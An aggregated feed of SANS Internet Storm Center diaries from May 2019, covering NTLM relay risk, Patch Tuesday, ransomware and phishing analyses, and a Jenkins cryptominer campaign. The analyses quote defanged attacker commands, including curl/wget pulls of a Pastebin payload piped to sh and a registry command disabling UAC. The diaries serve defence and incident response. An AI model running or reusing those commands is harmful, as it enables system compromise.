SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 2 óra 37 perc
3 óra 37 perc

Is Metadata Only Approach, Good Enough for Network Traffic Analysis?, (Sun, May 19th)

Five years ago I wrote a diary how metadata could be used to detect suspicious activity[1]. Obviously collecting packets allows the analyst to scrutinize the payload which allows in-depth analysis. However, with higher content being encrypted and the cost of storing terabyte of packets, more organization are now looking at a metadata-only approach to be good enough to respond to incidents.

Lately, I had discussion on what might be the "next generation of super tools" to help catch bad actors in a network. If you already have logs from many sources plus metadata with full packet capture at some key locations, using tools like User and Entity Behavior Analytics (UEBA) and Endpoint Detection and Response (EDR) are becoming really effective in the network at catching bad actors are becoming in some cases, a replacement for full packet capture.

This appears to be true when combining data from sources such as network devices logs made available to review endpoint activities. Not that long ago, network forensic tools (NFTs) were storing everything in/out of a network as raw packets, but today’s fast networks is making this approach pretty much impractical for nearly everyone. This is where rich host and network metadata can capture most of the information required and provide much better investigative value for the money, it is easier and in most cases faster to find issues lurking in the network at a much lower computational and storage cost.

There are still some cases where metadata might be insufficient where packets capture might be required to complement the investigation but that is becoming rarer.

What do you think currently works best for you in detecting actors inside a network: logs, packets, UEBA, EDR or a combination of some of these tools?

[1] https://isc.sans.edu/forums/diary/Is+Metadata+the+Magic+in+Modern+Network+Security/16114
[2] https://isc.sans.edu/forums/diary/Mapping+Use+Cases+to+Logs+Which+Logs+are+the+Most+Important+to+Collect/22526/
[3] https://isc.sans.edu/diary/Collecting+Logs+from+Security+Devices+at+Home/14614

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 17.

ISC Stormcast For Friday, May 17th 2019 https://isc.sans.edu/podcastdetail.html?id=6502, (Fri, May 17th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 16.

The Risk of Authenticated Vulnerability Scans, (Thu, May 16th)

NTLM relay attacks have been a well-known opportunity to perform attacks against Microsoft Windows environments for a while and they remain usually successful. The magic with NTLM relay attacks? You don’t need to lose time to crack the hashes, just relay them to the victim machine. To achieve this, we need a “responder” that will capture the authentication session on a system and relay it to the victim. A lab is easy to setup: Install the Responder framework[1]. The framework contains a tool called MultiRelay.py which helps to relay the captured NTLM authentication to a specific target and, if the attack is successful, execute some code! (There are plenty of blog posts that explain in details how to (ab)use of this attack scenario).
 
Once you deployed all tools, you need to wait for an “interesting” user to connect on the infected system. How to find such kind of juicy users credentials? Most vulnerability scanners propose different scanning modes. The classic one is a non-authenticated scan based on available ports (compare this to a penetration test in "black box" mode). In many organizations, scans are performed in "authenticated mode". This time, the scanner has credentials to connect to targets and is, therefore, able to access more information like the list of installed applications (compare this to a penetration test in "grey box" mode). See the example below with the free scanner OpenVAS[2]:


You can configure OpenVAS to collect information via SSH, SMB, SNMP or even connect to a VMware hypervisor. To achieve this, you need to provide valid credentials that have enough access rights to perform basic tasks on the scanned hosts.  

I was aware of a case where attackers implemented an NTLM relay on a first victim's host and waited for some SMB authentication. The vulnerability scanner used credentials to perform an authenticated scan and its connection details were automatically reused to pivot internally and infect more hosts. Seen that such users have more rights to do their job, it's always an interesting candidate for attackers.

So keep in mind that using security tools could also introduce some new risks! By the way, how to protect yourself against this type of attack? Use SMBv3 and enable SMB signing[2]!
 
[1] https://github.com/lgandx/Responder
[2] http://www.openvas.org/
[3] https://blogs.msdn.microsoft.com/openspecification/2017/05/26/smb-2-and-smb-3-security-in-windows-10-the-anatomy-of-signing-and-cryptographic-keys/
 
 
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 16.

ISC Stormcast For Thursday, May 16th 2019 https://isc.sans.edu/podcastdetail.html?id=6500, (Thu, May 16th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 15.

ISC Stormcast For Wednesday, May 15th 2019 https://isc.sans.edu/podcastdetail.html?id=6498, (Wed, May 15th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 14.

VMWare just released a security update to address a DLL-hijacking issue affecting VMware Workstation Pro / Player. Details: https://www.vmware.com/security/advisories/VMSA-2019-0007.html, (Tue, May 14th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 14.

Microsoft May 2019 Patch Tuesday, (Tue, May 14th)

This month we got patches for 79 vulnerabilities from Microsoft and 2 from Adobe. From those, 23 are critical and 2 were previously known - including the one that has been exploited in the wild.

The exploited vulnerability (CVE-2019-0863) affects the way Windows Error Reporting (WER) handles files. It may allow a local attacker to elevate privileges and run arbitrary code in kernel mode. The CVSS V3 for this vulnerability is 7.8.

The other previously known (CVE-2019-0932) is an information disclosure vulnerability which affects Skype for Android. Exploiting this vulnerability, an attacker could listen to the conversation of a Skype for Android without the user’s knowledge.

Amongst critical vulnerabilities, it worth mentioning a remote code execution in Windows Remote Desktop Services (CVE-2019-0708). An unauthenticated attacker may exploit this vulnerability by sending specially crafted packets to the vulnerable service and then execute arbitrary code on the target system. It affects Windows 7 and Windows Server 2008. The CVSS V3 score for this vulnerability is 9.8.

Last but not least, we have a new critical remote execution vulnerability affecting GDI+ (Windows Graphics Device Interface). An attacker could exploit this vulnerability by convincing the user to open a specially crafted attachment in an e-mail or instant messenger, for example. The CVSS V3 for this vulnerability is 8.8.  

See Renato's dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

Description CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG) .NET Framework Denial of Service Vulnerability %%cve:2019-0864%% No No Less Likely Less Likely Important     .NET Framework and .NET Core Denial of Service Vulnerability %%cve:2019-0820%% No No Less Likely Less Likely Important     .Net Framework and .Net Core Denial of Service Vulnerability %%cve:2019-0980%% No No Less Likely Less Likely Important     %%cve:2019-0981%% No No Less Likely Less Likely Important     ASP.NET Core Denial of Service Vulnerability %%cve:2019-0982%% No No Less Likely Less Likely Important     Azure DevOps Server and Team Foundation Server Cross-site Scripting Vulnerability %%cve:2019-0872%% No No Less Likely Less Likely Important     %%cve:2019-0979%% No No - - Important     Azure DevOps Server and Team Foundation Server Information Disclosure Vulnerability %%cve:2019-0971%% No No Less Likely Less Likely Important     Chakra Scripting Engine Memory Corruption Vulnerability %%cve:2019-0912%% No No - - Critical 4.2 3.8 %%cve:2019-0913%% No No - - Critical 4.2 3.8 %%cve:2019-0914%% No No - - Critical 4.2 3.8 %%cve:2019-0915%% No No - - Critical 4.2 3.8 %%cve:2019-0916%% No No - - Critical 4.2 3.8 %%cve:2019-0917%% No No - - Critical 4.2 3.8 %%cve:2019-0922%% No No - - Critical 4.2 3.8 %%cve:2019-0923%% No No - - Important 4.2 3.8 %%cve:2019-0924%% No No - - Critical 4.2 3.8 %%cve:2019-0925%% No No - - Critical 4.2 3.8 %%cve:2019-0927%% No No - - Critical 4.2 3.8 %%cve:2019-0933%% No No - - Critical 4.2 3.8 %%cve:2019-0937%% No No - - Critical 4.2 3.8 Diagnostic Hub Standard Collector, Visual Studio Standard Collector Elevation of Privilege Vulnerability %%cve:2019-0727%% No No Less Likely Less Likely Important 6.7 6.0 GDI+ Remote Code Execution Vulnerability %%cve:2019-0903%% No No More Likely More Likely Critical 8.8 7.9 Internet Explorer Information Disclosure Vulnerability %%cve:2019-0930%% No No More Likely More Likely Important 2.4 2.2 Internet Explorer Memory Corruption Vulnerability %%cve:2019-0929%% No No - - Critical 7.5 6.7 Internet Explorer Security Feature Bypass Vulnerability %%cve:2019-0995%% No No - - Important 7.3 6.6 Internet Explorer Spoofing Vulnerability %%cve:2019-0921%% No No Less Likely Less Likely Important 2.4 2.2 Jet Database Engine Remote Code Execution Vulnerability %%cve:2019-0893%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0894%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0895%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0896%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0897%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0898%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0899%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0900%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0901%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0902%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0889%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0890%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0891%% No No Less Likely Less Likely Important 7.8 7.0 Latest Servicing Stack Updates ADV990001 No No - - Critical     May 2019 Adobe Flash Security Update ADV190012 No No - - Critical     Microsoft Azure AD Connect Elevation of Privilege Vulnerability %%cve:2019-1000%% No No Less Likely Less Likely Important     Microsoft Browser Memory Corruption Vulnerability %%cve:2019-0940%% No No More Likely More Likely Critical 7.5 6.7 Microsoft Dynamics On-Premise Security Feature Bypass %%cve:2019-1008%% No No Less Likely Less Likely Important     Microsoft Edge Elevation of Privilege Vulnerability %%cve:2019-0938%% No No - - Important 4.2 3.8 Microsoft Edge Memory Corruption Vulnerability %%cve:2019-0926%% No No - - Critical 4.2 3.8 Microsoft Guidance to mitigate Microarchitectural Data Sampling vulnerabilities ADV190013 No No More Likely More Likely Important     Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability %%cve:2019-0945%% No No Less Likely Less Likely Important     %%cve:2019-0946%% No No Less Likely Less Likely Important     %%cve:2019-0947%% No No - - Important     Microsoft Office SharePoint XSS Vulnerability %%cve:2019-0963%% No No - - Important     Microsoft SQL Server Analysis Services Information Disclosure Vulnerability %%cve:2019-0819%% No No Less Likely Less Likely Important     Microsoft SharePoint Elevation of Privilege Vulnerability %%cve:2019-0957%% No No Less Likely Less Likely Important     %%cve:2019-0958%% No No Less Likely Less Likely Important     Microsoft SharePoint Server Information Disclosure Vulnerability %%cve:2019-0956%% No No - - Important     Microsoft SharePoint Server Remote Code Execution Vulnerability %%cve:2019-0952%% No No - - Important     Microsoft SharePoint Spoofing Vulnerability %%cve:2019-0949%% No No - - Important     %%cve:2019-0950%% No No - - Important     %%cve:2019-0951%% No No - - Important     Microsoft Word Remote Code Execution Vulnerability %%cve:2019-0953%% No No Less Likely Less Likely Critical     NuGet Package Manager Tampering Vulnerability %%cve:2019-0976%% No No Less Likely Less Likely Important     Remote Desktop Services Remote Code Execution Vulnerability %%cve:2019-0708%% No No - - Critical 9.8 8.8 Scripting Engine Memory Corruption Vulnerability %%cve:2019-0884%% No No More Likely More Likely Critical 6.4 5.8 %%cve:2019-0911%% No No More Likely More Likely Critical 7.5 6.7 %%cve:2019-0918%% No No More Likely More Likely Critical 7.5 6.7 Skype for Android Information Disclosure Vulnerability %%cve:2019-0932%% Yes No Less Likely Less Likely Important     Unified Write Filter Elevation of Privilege Vulnerability %%cve:2019-0942%% No No Less Likely Less Likely Important 4.4 4.0 Win32k Elevation of Privilege Vulnerability %%cve:2019-0892%% No No More Likely More Likely Important 7.8 7.0 Windows DHCP Server Remote Code Execution Vulnerability %%cve:2019-0725%% No No Less Likely Less Likely Critical 8.1 7.3 Windows Defender Application Control Security Feature Bypass Vulnerability %%cve:2019-0733%% No No Less Likely Less Likely Important 5.3 4.8 Windows Elevation of Privilege Vulnerability %%cve:2019-0734%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0936%% No No More Likely More Likely Important 7.8 7.0 Windows Error Reporting Elevation of Privilege Vulnerability %%cve:2019-0863%% Yes Yes Detected Detected Important 7.8 7.0 Windows GDI Information Disclosure Vulnerability %%cve:2019-0882%% No No More Likely More Likely Important 4.7 4.2 %%cve:2019-0961%% No No More Likely More Likely Important 4.7 4.2 %%cve:2019-0758%% No No More Likely More Likely Important 4.7 4.2 Windows Hyper-V Information Disclosure Vulnerability %%cve:2019-0886%% No No Less Likely Less Likely Important 5.5 5.0 Windows Kernel Elevation of Privilege Vulnerability %%cve:2019-0881%% No No More Likely More Likely Important 8.8 7.9 Windows NDIS Elevation of Privilege Vulnerability %%cve:2019-0707%% No No More Likely More Likely Important 7.0 6.3 Windows OLE Remote Code Execution Vulnerability %%cve:2019-0885%% No No More Likely More Likely Important 7.8 7.0 Windows Storage Service Elevation of Privilege Vulnerability %%cve:2019-0931%% No No More Likely More Likely Important 7.0 6.3

--
Renato Marinho
Morphus Labs| LinkedInTwitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 14.

ISC Stormcast For Tuesday, May 14th 2019 https://isc.sans.edu/podcastdetail.html?id=6496, (Tue, May 14th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 13.

From Phishing To Ransomware?, (Mon, May 13th)

On Friday, one of our readers reported a phishing attempt to us (thanks to him!). Usually, those emails are simply part of classic phishing waves and try to steal credentials from victims but, this time, it was not a simple phishing. Here is a copy of the email, which was nicely redacted:

When the victim clicks on thee "Review and take action" button, (s)he is redirected to a first website:

hxxp://xoxouload[.]ml

This automatically redirects to a second site via a HTTP/301 code:

hxxp://217[.]199[.187[.]73/verifiedvsa.com/www.office365.com/OneDrive.htm

The following picture is displayed:

Yes, this is just a simple picture, no links are active. Where is the issue? Two seconds after that page has been loaded, the browser asks the victim to save a file. The HTML code contains indeed a new redirect:

<meta http-equiv="Refresh" content="2;URL=hxxp://bit[.]ly/2WzXy5t">

The shortened URL links to:

hxxp://lichxuanohha[.]com/wp-content/themes/xcx/i47.php

This URL drops a malicious file called "Academics.pdf.exe" (SHA256: ba2598fdd2e5c12e072fbe4c10fcdc6742bace92c0edba42ca4ca7bc195cb813). When I grabbed the file for the fist time on Friday, it was unknown on VT. Since, it has been uploaded by someone else and has a score of 47/71[1]. The file is identified by many AV's as a Banking Trojan but, while performing a basic analysis, I found that the malware drops this picture on the target:

I search for this email address and found a Tweet by @malwarehunterteam from April 25:

Some actions performed by the malware:

C:\Windows\system32\cmd.exe /c wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\

This drops a crypt.dll in C:\Windows\system32\migwiz\ (SHA256: 856623bc2e40d43960e2309f317f7d2c841650d91f2cd847003e0396299c3f98)[2]

"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\888.vbs" "C:\Windows\System32\migwiz\migwiz.exe" C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

I saw many files created on the Desktop with filenames "lock_<randomstring>.<extension> but the honeypot files were not encrypted. I'm still having a look at the sample.

[1] https://www.virustotal.com/gui/file/ba2598fdd2e5c12e072fbe4c10fcdc6742bace92c0edba42ca4ca7bc195cb813/detection
[2] https://www.virustotal.com/gui/file/856623bc2e40d43960e2309f317f7d2c841650d91f2cd847003e0396299c3f98/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 13.

ISC Stormcast For Monday, May 13th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6494, (Mon, May 13th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 10.

DSSuite - A Docker Container with Didier's Tools, (Fri, May 10th)

If you follow us and read our daily diaries, you probably already know some famous tools developed by Didier (like oledump.py, translate.py and many more). Didier is using them all the time to analyze malicious documents. His tools are also used by many security analysts and researchers. The complete toolbox is available on his github.com page[1]. You can clone the repository or download the complete package available as a zip archive[2]. However, it’s not convenient to install them all the time when you’re switching from computers all the time if, like me, you’re always on the road between different customers.

Being a fan of Docker containers, I built a Docker image called “DSSuite” (a not very original name :-) that contains all Didier’s tools preinstalled and ready to use from any system that has Docker available. The image is available on hub.docker.com[3]. 

To use it, just pull the image:

$ docker pull rootshell/dssuite

Once done, you can use tools directly from Docker or start an interactive shell. First, let’s try a simple oledump against a sample OLE file:

$ file malicious_ole.vir malicious_ole.vir: Composite Document File V2 Document, Cannot read section info $ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py malicious_ole.vir 1: O 49737 '\x01Ole10Native' 2: 6 '\x03ObjInfo’

If you don’t pass arguments to the container, an interactive shell will be started:

$ docker run -it -v $(pwd):/malware rootshell/dssuite ____ ____ ____ _ _ | _ \/ ___/ ___| _ _(_) |_ ___ | | | \___ \___ \| | | | | __/ _ \ | |_| |___) |__) | |_| | | || __/ |____/|____/____/ \__,_|_|\__\___| Version 1.0 - Help: https://blog.didierstevens.com/my-software/ root@a43d72df1d9b:/malware#

Note that you need to map a /malware volume to access the malicious files to analyze

For more convenience, just create an alias like this in your shell to call directly the commands:

$ alias dssuite='docker run -it --rm -v $(pwd):/malware rootshell/dssuite $@‘ $ dssuite oledump.py sample.doc

Most of the tools are running out of the box but let me know if you detect some issues and I'll keep the Docker updated

[1] https://github.com/DidierStevens/DidierStevensSuite
[2] https://didierstevens.com/files/software/DidierStevensSuite.zip
[3] https://hub.docker.com/r/rootshell/dssuite

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 10.

ISC Stormcast For Friday, May 10th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6492, (Fri, May 10th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 9.

ISC Stormcast For Thursday, May 9th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6490, (Thu, May 9th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 8.

ISC Stormcast For Wednesday, May 8th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6488, (Wed, May 8th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 8.

Email roulette, May 2019, (Wed, May 8th)

Introduction

For today's diary I play a game of email roulette.  My version of email roulette is picking a recent item of malicious spam (malspam), running the associated email attachment in a live sandbox, and identifying the malware.  I acquired a recent malspam example through VirusTotal (VT) Intelligence.  Let's see what the roulette wheel give us today!

Searching for malspam attachments in VT Intelligence

VT Intelligence is a subscription server, and from what I understand, it's fairly expensive.  Fortunately I have access through my employer.  In the VT Intelligence search window, I used the following parameters:

tag:attachment fs:2019-05-07+ p:3+

This returned anything tagged as an email attachment, first seen on or after 2019-05-07, with at least 3 vendors identifying an item as malicious.  After the results appeared, I sorted by the most recent submissions.


Shown above:  Searching and sorting in the VT Intelligence portal.


Shown above:  Results sorted by most recent at the time of my search.

The three most recent results I saw were 7-zip archives (.7z files).  The file names did not use ASCII characters, but were base64 encoded.  The base64 string represents UTF-8 characters, where the format is name:"=?utf-8?B?[base64 string]?="

I picked the most recent result and selected the relations tab, which revealed the associated malspam.  Then I retrieved that email from VT Intelligence.


Shown above:  Pivoting on the attachment to find its parent email.


Shown above:  The email opened in Thunderbird on a Windows 7 host.

The attached 7-zip archive contained 3 files with different names, but they were all the same file hash, so they were the same malware.  I extracted them and ran one on a vulnerable Windows host.  The result was a Gandcrab ransomware infection.


Shown above:  Encrypted files and the ransom note on my infected Windows host.

Indicators

The following are indicators associated with this infection:

SHA256 hash: 39f97e750a8ebcc68a5392584c9fd8edc934e978d6495d3ae430cb7ee3275ffe

  • File size: 157,810 bytes
  • File description: Example of Korean malspam (.eml file) pushing Gandcrab

SHA256 hash: 5444841becddce7ef2601752df63db2a9d067d46a359d8b0288da2ebf494ff41

  • File size: 112,792 bytes
  • File description: 7-zip archive (.7z file) attached to Korean malspam

SHA256 hash: df53498804b4e7dbfb884a91df7f8b371de90d6908640886f929528f1d6bd0cc

  • File size: 173,568 bytes
  • File description: Gandcrab executables (.exe files) extracted from the above .7z archive
  • Any.Run sandbox analysis

Final words

This round of email roulette gave us a Gandcrab ransomware infection.  What type of malware might I find next?  Perhaps we'll know when I try this again next month for another diary.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 8.

Vulnerable Apache Jenkins exploited in the wild, (Tue, May 7th)

An ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software – of course.

The exploited vulnerability, CVE-2018-1000861 [1], was published in December 2018. It affects Stapler Web framework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by accessing crafted URLs.

Looking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published early March this year.

After analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.

Vulnerability Exploitation

In the picture below, you can see the exploitation occurring. 

Notice that there is a base64 encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign is using Pastebin as the C2:

(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh

The content of the paste ‘wDBa7jCQ’ is no longer available, but the content was another paste:

(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed 's/\r//'|sh

The content of ‘D8E71JBJ’ paste is no longer available also, but it was the shell script down in following images.

The Dropper

The dropper named “Kerberods” (not “Kerberos” as the protocol) caught my attention due to the way it is packed and the way it acts if it has ‘root’ privileges on the machine.

After analyzing the binary, I could see that the packer used was a custom version of ‘UPX’. UPX is an open source software and there are many ways UPX can be modified to make it hard to unpack the file using regular UPX version. There is a great presentation on this subject by @unixfreaxjp [2] called ‘Unpacking the non-unpackable’ which shows different forms to fix ELF headers in order to unpack files.

Fortunately, in this case, the UPX customizations involved just the modification of the magic constant UPX_MAGIC_LE32 from 'UPX' to some other three letters. Thus, reverting it to UPX in different parts of the binary, it was possible to unpack the binary with the regular version of UPX.

The Glibc hooks

The other interesting part is the way ‘Kerberods’ acts to persist and hide itself if has root privileges on the machine.

If it is the case, it drops, compiles and loads a library into the operating system that hooks different functions of Glibc to modify its behavior. In other words, it acts like a rootkit.

In the image below it is possible to see that the function ‘open’ will now check for some strings in the ‘pathname’ to act in a different way. The intention is to avoid anyone (including root) to be able to open the binary ‘khugepageds’, which is the cryptominer, the ‘ld.so.preload’, which is the file that loads the malicious library and the library ‘libpamcd.so’ itself.

 

Another hook, to show one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.


 

Indicators of Compromise (IOCs)

Filesystem
74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8
Bab27f611518dc55b00b1a9287bdb8e059c4f4cc1607444f40e0c45d5842994f
43a00e0dd57d110d1c88b18234185267ca2a79f8ae1905bef4ba225144c992d2
 

Network
SYSTEMTEN[.]ORG:51640
 

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 7.

ISC Stormcast For Tuesday, May 7th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6486, (Tue, May 7th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 6.

Text and T<NUL>e<NUL>x<NUL>t<NUL>, (Mon, May 6th)

I gave a few tips over the last weeks to help friends with processing files. Turned out that each time, UNICODE was involved.

Xavier had an issue with a malicious UDF file. I took a look with a binary editor:

The first bytes, FF FE, reminded me of a BOM: a Byte Order Mark. FF FE or FE FF can be found at the start of UTF-16 text files. It indicates the endianness: little endian (screenshot) or big endian.

Command file confirmed the endianness:

The fact that it contains just null bytes is unusual, but then again, this is actually not a text file, but an UDF file that was probably opened and saved with a text editor.

Another friend had a problem having a an XML file parsed by a SIEM. It threw an unusual, obscure error. It turned out here too, that the file was UNICODE, while the SIEM expected an ASCII file.

When opening text files with an editor, it's often not trivial to determine the encoding of the file. And not everyone is comfortable using an hexadecimal error.

If you want a command-line tool, I recommend the file command.

For a GUI tool on Windows, you can use the free text editor Notepad++.

It displays the encoding of the displayed file in its status bar:

LE BOM tells us that the file contains a BOM and is little endian. UCS-2 (an ISO standard equivalent with UNICODE and the basis for UTF-16). And we get bonus information: the line separator is carriage return / linefeed (CR LF). This was something Xavier had to deal with too.

This editor can of course convert encodings:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 6.

ISC Stormcast For Monday, May 6th 2019 https://isc.sans.edu/podcastdetail.html&#x3f;id=6484, (Sun, May 5th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2019. május 3.

A few Ghidra tips for IDA users, part 3 - conversion, labels, and comments, (Fri, May 3rd)

In this entry in my series, I'll look at a few more of the features I regularly use in IDA and how to accomplish the same in Ghidra.

The first one is simple conversion. In this case, hex to ASCII characters (classic stack strings stuff that we cover in Day 5 of FOR610). I miss IDA's 'R' key mapping, but that is currently taken by View/Edit References From. You can change that or create your own key mapping, Ctrl-Alt-R isn't currently taken, so that's what I use. Just like in IDA, you can right-click on the value, but then you have to choose Convert and then Char from the submenu.

Another of the features I use regularly, is renaming arguments, variables, and functions as I begin to figure out their purposes. In IDA, this is the 'N' key, in Ghidra, it is the 'L' key for Label. It works exactly like in IDA. In the screenshot below, you'll see it in the right-click menu.

And below is the actual dialog to do the renaming.

And, the last functionality I want to cover in this post is comments. There are 4 (well, 5) types of comments that you can create with Ghidra. Pre-comments which will appear above the instruction where you place it, post-comments which appear below, EOL (and repeatable) comments at the end of the line, and Plate comments, which change the generic "Function" comment at the top of the function. I actually like some of the additions, especially the plate comment which can be used to fill in info on what I've discovered about the functionality of the function in question.

And here are examples of each

I've got at least one more post in this series, probably next week. As with the others, if you have any tips, comments, corrections, etc. let me know via our contact page, e-mail, or via the comments below. Until next time,...

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.